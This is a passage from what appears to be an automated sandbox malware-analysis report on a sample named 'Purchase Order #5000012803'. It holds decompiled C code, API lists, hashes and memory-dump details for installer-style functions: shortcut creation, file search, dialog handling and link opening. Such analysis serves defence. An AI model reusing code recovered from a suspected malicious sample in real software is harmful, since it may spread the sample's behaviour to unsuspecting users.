					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\jones\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409360, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 0x34));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409360, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 0x34));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                      0x0040201b
                      0x00402025
                      0x0040202e
                      0x00402038
                      0x00402041
                      0x0040204b
                      0x0040204f
                      0x0040204f
                      0x00402054
                      0x00402065
                      0x0040206d
                      0x0040214d
                      0x0040214d
                      0x00402154
                      0x00402073
                      0x00402073
                      0x00402084
                      0x00402088
                      0x0040208e
                      0x00402098
                      0x0040209a
                      0x004020a5
                      0x004020a8
                      0x004020b5
                      0x004020b7
                      0x004020b9
                      0x004020c0
                      0x004020c3
                      0x004020c3
                      0x004020c6
                      0x004020d0
                      0x004020d8
                      0x004020dd
                      0x004020e9
                      0x004020e9
                      0x004020ec
                      0x004020f5
                      0x004020f8
                      0x00402101
                      0x00402106
                      0x00402118
                      0x00402127
                      0x00402129
                      0x00402135
                      0x00402135
                      0x00402127
                      0x00402137
                      0x0040213d
                      0x0040213d
                      0x00402140
                      0x00402146
                      0x0040214b
                      0x00402160
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040214b
                      0x00402156
                      0x00402880
                      0x0040288c

                      APIs
                      • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402065
                      • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409360,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040211F
                      Strings
                      • C:\Users\user\AppData\Local\Temp, xrefs: 0040209D
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: ByteCharCreateInstanceMultiWide
                      • String ID: C:\Users\user\AppData\Local\Temp
                      • API String ID: 123533781-47812868
                      • Opcode ID: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
                      • Instruction ID: 9a85de16ea5d7a81ede148d9b78cdb1ba9a910f30d2aff7a9c0f788a9809de35
                      • Opcode Fuzzy Hash: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
                      • Instruction Fuzzy Hash: 0E414DB5A00104AFDB00DFA4CD89E9E7BBABF49314B20416AF905EB2D1DA79DD41CB64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00402630, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                      Download Yara Rule
                      C-Code - Quality: 39%
                      			E00402630(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E004029E8(2), _t19 - 0x1a4) != 0xffffffff) {
					E004059E3(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E00405A85();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                      0x00402648
                      0x0040265c
                      0x00402667
                      0x00402668
                      0x004027a3
                      0x0040264a
                      0x0040264a
                      0x0040264c
                      0x0040264e
                      0x0040264e
                      0x00402880
                      0x0040288c

                      APIs
                      • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040263F
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: FileFindFirst
                      • String ID:
                      • API String ID: 1974802433-0
                      • Opcode ID: e252be4d8dac41554fd361ab132364df58656f291f34e3e62bfafec942fe1f51
                      • Instruction ID: 76eef0906e3fa6c86cf2ebea0eb1ad5f879b60bc34498b8afccad509cb3c3919
                      • Opcode Fuzzy Hash: e252be4d8dac41554fd361ab132364df58656f291f34e3e62bfafec942fe1f51
                      • Instruction Fuzzy Hash: 67F0A772A04100EED700EBB59D49EFE7778DF11324F6005BBE111B20C1C7B889419A2A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0019E842, Relevance: .2, Instructions: 196COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.668197587.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_19e000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 195a289bea6c427d6dd0e94af631ce1939ca6bc38f5db606016c202de45f5cbb
                      • Instruction ID: 78b6fbd1623f31808117aa7fce1b5adbc0ed59581bb8a20f13a250a22e72f3ad
                      • Opcode Fuzzy Hash: 195a289bea6c427d6dd0e94af631ce1939ca6bc38f5db606016c202de45f5cbb
                      • Instruction Fuzzy Hash: 9A618D31E00218ABCF20DFA4C884BAEBBF5BF58710F248059F956EB390EB749D018B55
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0019EA56, Relevance: .1, Instructions: 61COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.668197587.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_19e000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                      • Instruction ID: fb59054831deea4ada637f275142889febe5fdb440057b8478201c423f496885
                      • Opcode Fuzzy Hash: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                      • Instruction Fuzzy Hash: 3211C231A10109AFCF20DBAAD8888AEF7FDFF54790B5440A9E805D7220E734DE40C660
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0019EB46, Relevance: .0, Instructions: 26COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.668197587.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_19e000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                      • Instruction ID: 108ca85d9979560b7ff8b10316963a28ececdd21001ad81d07d897b98ce2aa61
                      • Opcode Fuzzy Hash: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                      • Instruction Fuzzy Hash: 1DE01A35764609DFCB58CBA8C981D25B3F8EB19330B154694F817CB7A1EB34EE00DA50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0019EB84, Relevance: .0, Instructions: 23COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.668197587.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_19e000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                      • Instruction ID: d548ee57416b52d8455906cb494683c26669be03c2944f8d1a824a6414de9bff
                      • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                      • Instruction Fuzzy Hash: 7FE08C323205108FCB30DA19D480896F3E9FBD83B171A486AE98BD3711C730FC008690
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0019EB07, Relevance: .0, Instructions: 7COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.668197587.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_19e000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                      • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                      • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                      • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00403964, Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                      Download Yara Rule
                      C-Code - Quality: 83%
                      			E00403964(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42047c = _t35;
					if(_t115 == 0x110) {
						 *0x423ea8 = _t125;
						 *0x420490 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f458 = _t91;
						E00403E37(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423688);
						 *0x42366c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42047c = 1;
					}
					_t122 =  *0x4091bc; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423ec0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403E83(0x40b);
						while(1) {
							_t37 =  *0x42047c;
							 *0x4091bc =  *0x4091bc + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091bc; // 0xffffffff
							__eflags = _t39 -  *0x423ec4;
							if(_t39 ==  *0x423ec4) {
								E0040140B(1);
							}
							__eflags =  *0x42366c - _t133;
							if( *0x42366c != _t133) {
								break;
							}
							__eflags =  *0x4091bc -  *0x423ec4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405AA7(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403E37(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403E37(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403E37(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423f2c - _t133;
							_v32 = _t49;
							if( *0x423f2c != _t133) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403E59(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f458, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423f2c - _t133;
							if( *0x423f2c == _t133) {
								_push( *0x420490);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f458);
							}
							E00403E6C();
							E00405A85(0x420498, 0x4236a0);
							E00405AA7(0x420498, _t125, _t130,  &(0x420498[lstrlenA(0x420498)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x420498);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423678);
									 *0x41fc68 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423ea0,  *_t130 +  *0x423680 & 0x0000ffff, _t125,  *(0x4091c0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423678 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403E37(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423678, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42366c - _t133;
									if( *0x42366c != _t133) {
										goto L61;
									}
									ShowWindow( *0x423678, 8);
									E00403E83(0x405);
									goto L58;
								}
								__eflags =  *0x423f2c - _t133;
								if( *0x423f2c != _t133) {
									goto L61;
								}
								__eflags =  *0x423f20 - _t133;
								if( *0x423f20 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423678);
						 *0x423ea8 = _t133;
						EndDialog(_t125,  *0x41f860);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423678, 0x40f, 0, 1);
						__eflags =  *0x42366c;
						return 0 |  *0x42366c == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420470, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420470,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403E9E(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423678, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423f2c - _t133;
										if( *0x423f2c == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f860 = 1;
											L21:
											_push(0x78);
											L22:
											E00403E10();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f860 = _t127;
										goto L21;
									}
									__eflags =  *0x4091bc - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423678);
						 *0x423678 = _a12;
						L58:
						if( *0x421498 == _t133 &&  *0x423678 != _t133) {
							ShowWindow(_t125, 0xa);
							 *0x421498 = 1;
						}
						L61:
						return 0;
					}
				}
			}






























                      0x0040396d
                      0x00403976
                      0x00403ab7
                      0x00403abb
                      0x00403abf
                      0x00403ac1
                      0x00403ac6
                      0x00403ad1
                      0x00403adc
                      0x00403ae1
                      0x00403ae3
                      0x00403ae5
                      0x00403ae8
                      0x00403aed
                      0x00403afb
                      0x00403b08
                      0x00403b0f
                      0x00403b0f
                      0x00403b10
                      0x00403b10
                      0x00403b15
                      0x00403b1b
                      0x00403b22
                      0x00403b28
                      0x00403b2a
                      0x00403b6a
                      0x00403b6f
                      0x00403b74
                      0x00403b74
                      0x00403b79
                      0x00403b82
                      0x00403b84
                      0x00403b89
                      0x00403b8f
                      0x00403b93
                      0x00403b93
                      0x00403b98
                      0x00403b9e
                      0x00000000
                      0x00000000
                      0x00403ba9
                      0x00403baf
                      0x00000000
                      0x00000000
                      0x00403bb8
                      0x00403bc0
                      0x00403bc5
                      0x00403bc8
                      0x00403bce
                      0x00403bd3
                      0x00403bd6
                      0x00403bdc
                      0x00403be1
                      0x00403be4
                      0x00403bea
                      0x00403bf2
                      0x00403bf8
                      0x00403bfe
                      0x00403c02
                      0x00403c09
                      0x00403c09
                      0x00403c09
                      0x00403c13
                      0x00403c25
                      0x00403c31
                      0x00403c36
                      0x00403c40
                      0x00403c46
                      0x00403c48
                      0x00403c4d
                      0x00403c4a
                      0x00403c4a
                      0x00403c4a
                      0x00403c5d
                      0x00403c75
                      0x00403c77
                      0x00403c7d
                      0x00403c92
                      0x00403c7f
                      0x00403c88
                      0x00403c8a
                      0x00403c8a
                      0x00403c98
                      0x00403ca8
                      0x00403cb9
                      0x00403cc0
                      0x00403cc6
                      0x00403cca
                      0x00403ccf
                      0x00403cd1
                      0x00000000
                      0x00403cd7
                      0x00403cd7
                      0x00403cd9
                      0x00000000
                      0x00000000
                      0x00403cdf
                      0x00403ce3
                      0x00403d08
                      0x00403d0e
                      0x00403d14
                      0x00403d16
                      0x00000000
                      0x00000000
                      0x00403d3c
                      0x00403d42
                      0x00403d44
                      0x00403d49
                      0x00000000
                      0x00000000
                      0x00403d4f
                      0x00403d52
                      0x00403d55
                      0x00403d6c
                      0x00403d78
                      0x00403d91
                      0x00403d97
                      0x00403d9b
                      0x00403da0
                      0x00403da6
                      0x00000000
                      0x00000000
                      0x00403db0
                      0x00403dbb
                      0x00000000
                      0x00403dbb
                      0x00403ce5
                      0x00403ceb
                      0x00000000
                      0x00000000
                      0x00403cf1
                      0x00403cf7
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00403cfd
                      0x00403cd1
                      0x00403dc8
                      0x00403dd4
                      0x00403ddb
                      0x00000000
                      0x00403b2c
                      0x00403b2c
                      0x00403b2f
                      0x00403b62
                      0x00403b62
                      0x00403b64
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00403b64
                      0x00403b31
                      0x00403b35
                      0x00403b3a
                      0x00403b3c
                      0x00000000
                      0x00000000
                      0x00403b4c
                      0x00403b54
                      0x00000000
                      0x00403b5a
                      0x00403988
                      0x00403988
                      0x0040398c
                      0x00403991
                      0x004039a0
                      0x004039a0
                      0x004039a9
                      0x004039b2
                      0x004039bd
                      0x004039bd
                      0x004039c9
                      0x004039e5
                      0x004039e8
                      0x004039fb
                      0x00403a01
                      0x00403aa4
                      0x00000000
                      0x00403aad
                      0x00403a07
                      0x00403a14
                      0x00403a16
                      0x00403a18
                      0x00403a37
                      0x00403a37
                      0x00403a3a
                      0x00403a3f
                      0x00403a42
                      0x00403a52
                      0x00403a53
                      0x00403a55
                      0x00403a8b
                      0x00403a9e
                      0x00000000
                      0x00403a9e
                      0x00403a57
                      0x00403a5d
                      0x00403a76
                      0x00403a7b
                      0x00403a7d
                      0x00000000
                      0x00000000
                      0x00403a7f
                      0x00403a6b
                      0x00403a6b
                      0x00403a6d
                      0x00403a6d
                      0x00000000
                      0x00403a6d
                      0x00403a60
                      0x00403a65
                      0x00000000
                      0x00403a65
                      0x00403a44
                      0x00403a4a
                      0x00000000
                      0x00000000
                      0x00403a4c
                      0x00000000
                      0x00403a4c
                      0x00403a3c
                      0x00000000
                      0x00403a3c
                      0x00403a22
                      0x00403a29
                      0x00403a2f
                      0x00403a31
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00403a31
                      0x004039ed
                      0x00000000
                      0x004039cb
                      0x004039d1
                      0x004039db
                      0x00403de1
                      0x00403de7
                      0x00403df4
                      0x00403dfa
                      0x00403dfa
                      0x00403e04
                      0x00000000
                      0x00403e04
                      0x004039c9

                      APIs
                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039A0
                      • ShowWindow.USER32(?), ref: 004039BD
                      • DestroyWindow.USER32 ref: 004039D1
                      • SetWindowLongA.USER32 ref: 004039ED
                      • GetDlgItem.USER32 ref: 00403A0E
                      • SendMessageA.USER32 ref: 00403A22
                      • IsWindowEnabled.USER32(00000000), ref: 00403A29
                      • GetDlgItem.USER32 ref: 00403AD7
                      • GetDlgItem.USER32 ref: 00403AE1
                      • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403AFB
                      • SendMessageA.USER32 ref: 00403B4C
                      • GetDlgItem.USER32 ref: 00403BF2
                      • ShowWindow.USER32(00000000,?), ref: 00403C13
                      • EnableWindow.USER32(?,?), ref: 00403C25
                      • EnableWindow.USER32(?,?), ref: 00403C40
                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C56
                      • EnableMenuItem.USER32 ref: 00403C5D
                      • SendMessageA.USER32 ref: 00403C75
                      • SendMessageA.USER32 ref: 00403C88
                      • lstrlenA.KERNEL32(00420498,?,00420498,004236A0), ref: 00403CB1
                      • SetWindowTextA.USER32(?,00420498), ref: 00403CC0
                      • ShowWindow.USER32(?,0000000A), ref: 00403DF4
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                      • String ID:
                      • API String ID: 184305955-0
                      • Opcode ID: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
                      • Instruction ID: caafd2a66b76c4ae3962cc82e2ded254e31ce9ec1c8840106f3b43a2641cb278
                      • Opcode Fuzzy Hash: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
                      • Instruction Fuzzy Hash: 95C1AF71A04204BBDB206F21ED85E2B7E7CEB05706F40453EF641B12E1C779AA429F6E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00403F7F, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON
                      Download Yara Rule
                      C-Code - Quality: 93%
                      			E00403F7F(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t103;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420478 =  *0x420478 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403E9E(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422e40;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422e40
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423ea8, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423ea8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420478 != 0) {
						goto L25;
					} else {
						_t103 =  *0x41fc68; // 0x0
						_t25 = _t103 + 0x14; // 0x14
						_t112 = _t25;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403E59(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E0040420A();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x42367c - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x423ed8;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403F4B;
				E00403E37(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403E37(_a4);
